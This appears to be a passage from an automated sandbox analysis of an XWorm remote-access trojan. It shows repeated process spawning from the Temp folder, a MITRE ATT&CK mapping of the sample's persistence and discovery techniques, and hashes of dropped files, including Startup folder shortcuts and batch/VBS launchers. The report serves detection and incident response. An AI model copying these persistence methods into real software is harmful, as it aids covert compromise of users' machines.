        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        23⤵
        Executes dropped EXE
        
        PID:2148
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        23⤵
        Executes dropped EXE
        
        PID:3828
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        24⤵
        Executes dropped EXE
        
        PID:2412
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        24⤵
        Executes dropped EXE
        
        PID:3568
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        25⤵
        Executes dropped EXE
        
        PID:3064
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        25⤵
        Executes dropped EXE
        
        PID:4332
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        26⤵
        Executes dropped EXE
        
        PID:1908
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        26⤵
        Executes dropped EXE
        
        PID:1972
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        27⤵
        Executes dropped EXE
        
        PID:3876
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        27⤵
        Executes dropped EXE
        
        PID:1580
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        28⤵
        Executes dropped EXE
        
        PID:1416
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        28⤵
        Executes dropped EXE
        
        PID:968
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        29⤵
        Executes dropped EXE
        
        PID:3580
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        29⤵
        Executes dropped EXE
        
        PID:4560
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        30⤵
        Executes dropped EXE
        
        PID:1320
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        30⤵
        Executes dropped EXE
        
        PID:936
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        31⤵
        Executes dropped EXE
        
        PID:2896
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        31⤵
        Executes dropped EXE
        
        PID:4784
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        32⤵
        Executes dropped EXE
        
        PID:2100
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        32⤵
        Executes dropped EXE
        
        PID:4424
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        33⤵
        Executes dropped EXE
        
        PID:4564
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        33⤵
        Executes dropped EXE
        
        PID:3464
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        34⤵
        Executes dropped EXE
        
        PID:2084
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        34⤵
        Executes dropped EXE
        
        PID:3720
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        35⤵
        Executes dropped EXE
        
        PID:1768
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        35⤵
        Executes dropped EXE
        
        PID:3436
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        36⤵
        Executes dropped EXE
        
        PID:4104
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        36⤵
        Executes dropped EXE
        
        PID:1224
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        37⤵
        Executes dropped EXE
        
        PID:1328
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        37⤵
        
        PID:844
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        38⤵
        
        PID:4504
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        38⤵
        
        PID:1848
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        39⤵
        
        PID:432
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        39⤵
        
        PID:1560
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        40⤵
        
        PID:2312
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        40⤵
        
        PID:224
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        41⤵
        
        PID:1272
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        41⤵
        
        PID:2444
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        42⤵
        
        PID:1424
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        42⤵
        
        PID:2344
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        43⤵
        
        PID:2120
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        43⤵
        
        PID:2240
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        44⤵
        
        PID:2196
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        44⤵
        
        PID:5008
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        45⤵
        
        PID:2000
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        45⤵
        
        PID:904
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        46⤵
        
        PID:1960
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        46⤵
        
        PID:3580
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        47⤵
        
        PID:132
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        47⤵
        
        PID:2484
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        48⤵
        
        PID:1476
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        48⤵
        
        PID:2108
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        49⤵
        
        PID:1108
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        49⤵
        
        PID:2640
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        50⤵
        
        PID:3740
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        50⤵
        
        PID:744
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        51⤵
        
        PID:1400
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        51⤵
        
        PID:2084
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        52⤵
        
        PID:3840
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        52⤵
        
        PID:1852
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        53⤵
        
        PID:4224
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        53⤵
        
        PID:3196
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        54⤵
        
        PID:2316
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        54⤵
        
        PID:1008
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        55⤵
        
        PID:820
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        55⤵
        
        PID:3568
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        56⤵
        
        PID:428
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        56⤵
        
        PID:4928
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        57⤵
        
        PID:1272
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        57⤵
        
        PID:3320
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        58⤵
        
        PID:3684
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        58⤵
        
        PID:5000
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        59⤵
        
        PID:2772
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        59⤵
        
        PID:3044
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        60⤵
        
        PID:3908
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        60⤵
        
        PID:4716
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        61⤵
        
        PID:2944
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        61⤵
        
        PID:3476
        
        C:\Users\Admin\AppData\Local\Temp\Xworm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
        62⤵
        
        PID:3712
        
        C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
        62⤵
        
        PID:936

C:\Users\Admin\AppData\Roaming\System User
"C:\Users\Admin\AppData\Roaming\System User"
1⤵
- Executes dropped EXE
PID:1444

C:\Users\Admin\AppData\Roaming\System User
"C:\Users\Admin\AppData\Roaming\System User"
1⤵
PID:2188

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Xworm V5.6.exe.log

Filesize
654B

MD5
2cbbb74b7da1f720b48ed31085cbd5b8

SHA1
79caa9a3ea8abe1b9c4326c3633da64a5f724964

SHA256
e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3

SHA512
ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
df472dcddb36aa24247f8c8d8a517bd7

SHA1
6f54967355e507294cbc86662a6fbeedac9d7030

SHA256
e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

SHA512
06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
db7ff9539016ded6252d53cd079982ec

SHA1
3eb3186be6df6bf914ac3d13f15eb4016ea3a08b

SHA256
481eb0c1dbeaebbbdcf6dd26d1d928718f8897c667e1be2ca53a34c53911bac3

SHA512
dbc32f045166092edf0661f2447d57eb77e7fd0ad83cfc1a55ffaf056e24fefebc8309718944547b2141eccce50f6bd4123d9fc602b35d61d37b4b9659411c8c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d0a4a3b9a52b8fe3b019f6cd0ef3dad6

SHA1
fed70ce7834c3b97edbd078eccda1e5effa527cd

SHA256
21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31

SHA512
1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
050578bcbe71fcf8467e66dd700f1a0b

SHA1
edc182f324a85f530077aff358c2b5269b088fc1

SHA256
ac02bf4fb18fffdf076eb0ef1169af67cbcb1306a009f4821f3b8546764b4a50

SHA512
f0ba63e42038eaf1017367674ad0dde48e7f39e1473680247027b07cf7aa03562cc52b9f91b1f63eaa684235f42d78761e522cacaad2a4fac9f1e8f96685d381

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cef328ddb1ee8916e7a658919323edd8

SHA1
a676234d426917535e174f85eabe4ef8b88256a5

SHA256
a1b5b7ada8ebc910f20f91ada3991d3321104e9da598c958b1edac9f9aca0e90

SHA512
747400c20ca5b5fd1b54bc24e75e6a78f15af61df263be932d2ee7b2f34731c2de8ce03b2706954fb098c1ac36f0b761cf37e418738fa91f2a8ea78572f545cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
de4f4b1f963ed82b2b53a5ac1dd5fe30

SHA1
4bc0980843cc0a550a31596595bba9543ad3c391

SHA256
75275bf45dc8e12131633009851977958b91e91c16dc83744556e52d44ea1b35

SHA512
10e4ceb8239c9987c2e3b76d098c6aeeaed174c4f420d3aeeb83ca6b9194af666623cbc65ed2398a7be69c48d4b142993f3fed69d1a5821e3e2589c19c155758

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6f0e62045515b66d0a0105abc22dbf19

SHA1
894d685122f3f3c9a3457df2f0b12b0e851b394c

SHA256
529811e4d3496c559f3bd92cd877b93b719c3ac4834202aa76ab9e16e25f9319

SHA512
f78426df6032ee77f8c463446ab1c6bb4669ef7a2463dead831ec4ff83a07d7dc702d79372d8bcaf4594bf0fb6e11e9f027f3e0325de9b19be5f51b7b80ed54a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
dde3d00a222303b9255e95288c8beeba

SHA1
ba3b800dc4baa26f5eb7266c964c3d77e2d56dc9

SHA256
a90f2047b44a82dc4ce8751d95c8e355f6c259fe654c844ded2a5b9d30013a44

SHA512
bfe83446a515271a8c6c5d5b6a27b419fd5b02e2fbbbff9a48c5a6a872e5ad291a89e86d65cb5e76753e377be7a1c28558c905517a9c5b28b0e22f242dc3af80

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
3c0fe86517be16d2b0a671148c0274d2

SHA1
bd7a487a037395e9ede9e76b4a455fdf386ba8db

SHA256
5f85aaa0472b8ae98352b7295cd59357e3e585b2299c540e9a8b5848a8d6b302

SHA512
642bc58c0a5682b45056e837be0dc5d1cd8c400f0e73f20d17c19720fb1fdae132b86873100955e9d65f72f1d481704b84c30d440ca53898c6d6d6f106b74f0a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
824da05d0f31c23ab953467d7a3812f7

SHA1
48349c5986cb56777bf77e747eafbc2f87dfc2c1

SHA256
6d266b3c94b03d8ed8648328f707c58177b2075c963aff4cbe6576d93df518b8

SHA512
5c35ada146f86ebaefc96d82f7176f7ccabf179a5297b04fb7f56a88cb6a8a1b1bb159b04599cf8f581f49a08137530aa3cc8a1e5c67a383880c6998e84c5367

Download Submit
C:\Users\Admin\AppData\Local\Temp\Anti RAT V12.exe

Filesize
438KB

MD5
911cf4001368badb4af856e73e8c6b80

SHA1
925a731112426b47944861e77f076e52a18b3380

SHA256
ea18732f72b1be6b86c3c846348d68d4e22ba36bacc00b06dd4f7be9b8700995

SHA512
1f47026ced94847ab49ad66cc425bb8fd54505ae71f25f119251fd4825b9d88c660096e6ad26a18eacf76f268f71cb3ac110d29bbec9c2345135ca119325e015

Download Submit
C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe

Filesize
7.7MB

MD5
bbf43a166ade7e2a0d2b930c41fb20a3

SHA1
d956dd742690aa25a59a84104cd3adbc40fcba78

SHA256
e948b08eb91c2dca67517126d71e5175e222598e6f1928d3ee78560b08e40b2b

SHA512
fcad5fc89da1d823a929cfebcdd19869605d646696f2399b2a84caa78e5a9854622e9d6b4184aba4ae080650513e1db01eb2412d995f87f18c4da90293fe523b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Xworm.exe

Filesize
76KB

MD5
2440671e67fb9e5087758e8c496d2c3a

SHA1
eac0d14a9866208ac6920a7a906eef761b3e0c2a

SHA256
e6c4447bc9d07a89b142f89e5011b2fa37eb77a243c9537ef992a1786a6044a3

SHA512
6bc35fd57775a3794b49c1e8576ba2e3b05f47a893b604bffeaf38cc01429dcccd5011c29dc80c88cf1fdaa9dd15c6cf168b885d532821939c68a603d7b64d82

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wekhbyod.hdp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System User.lnk

Filesize
769B

MD5
356024e2b21262a9efb13f8ec61136e6

SHA1
9d2af349c66619a188f421c9b5fca85ea77a0d1b

SHA256
458dbbb59b8a9117cd741b3c9a303508899dface64ab5b7f63865b17b2bc9b73

SHA512
4eab277c7dc1303e00c5249f7d458ce64d990181ddfcd99d8734b5dd0f76b6fe525b7f601515f0a82f6a426cc7e5999ac02382babf3c1e7ab0e32627d3efc8e9

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_934.bat

Filesize
10.5MB

MD5
ea1315beaae801fd48de7f359a6f9411

SHA1
a565aee47aa42bd87dafea38d6090447df6d822c

SHA256
0c55bb4d572eb35093da11086643bcf6c04a1b7653de40e5e289df61b96f0c16

SHA512
1616cad5cff6a75306db6479f98df4bf78084c0596983a9e46cedffed447ab0028a839604d3dd931603e535e455b52688a942e98582ba1751d1d13611ffbe00f

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_934.vbs

Filesize
115B

MD5
5db8098218698ce955372256a270dff6

SHA1
bb0c1098a19f5d55bcbff618f886ce23571b215a

SHA256
8552f2ca7b505c3917e446ee0690564314f2801e945f4f901e7f0509e6fc3070

SHA512
7de1f5e566c709f2295689760e03f6133fe681f7f8649bb51174351f3a2c802f1e541265eb4495beae67f5bf7c1774f0012aed2279cf3da056f68b17107ebd0b

Download Submit
memory/440-75-0x0000000000BD0000-0x0000000001382000-memory.dmp

Filesize
7.7MB

Download
memory/680-12-0x00007FFD74B90000-0x00007FFD75652000-memory.dmp

Filesize
10.8MB

Download
memory/680-9-0x0000022BFED70000-0x0000022BFED92000-memory.dmp

Filesize
136KB

Download
memory/680-50-0x00007FFD74B90000-0x00007FFD75652000-memory.dmp

Filesize
10.8MB

Download
memory/680-10-0x00007FFD74B90000-0x00007FFD75652000-memory.dmp

Filesize
10.8MB

Download
memory/680-0-0x00007FFD74B93000-0x00007FFD74B95000-memory.dmp

Filesize
8KB

Download
memory/680-11-0x00007FFD74B90000-0x00007FFD75652000-memory.dmp

Filesize
10.8MB

Download
memory/680-16-0x00007FFD74B93000-0x00007FFD74B95000-memory.dmp

Filesize
8KB

Download
memory/680-13-0x0000022B81490000-0x0000022B81498000-memory.dmp

Filesize
32KB

Download
memory/680-26-0x00007FFD74B90000-0x00007FFD75652000-memory.dmp

Filesize
10.8MB

Download
memory/680-14-0x0000022BA9C50000-0x0000022BAA436000-memory.dmp

Filesize
7.9MB

Download
memory/1084-51-0x0000028365880000-0x000002836603E000-memory.dmp

Filesize
7.7MB

Download
memory/2884-63-0x0000000000D80000-0x0000000000DF4000-memory.dmp

Filesize
464KB

Download
memory/4600-88-0x0000000000F70000-0x0000000000F88000-memory.dmp

Filesize
96KB

Download
memory/5116-25-0x00007FFD74B90000-0x00007FFD75652000-memory.dmp

Filesize
10.8MB

Download
memory/5116-27-0x00007FFD74B90000-0x00007FFD75652000-memory.dmp

Filesize
10.8MB

Download
memory/5116-28-0x00007FFD74B90000-0x00007FFD75652000-memory.dmp

Filesize
10.8MB

Download
memory/5116-29-0x00007FFD74B90000-0x00007FFD75652000-memory.dmp

Filesize
10.8MB

Download
memory/5116-32-0x00007FFD74B90000-0x00007FFD75652000-memory.dmp

Filesize
10.8MB

Download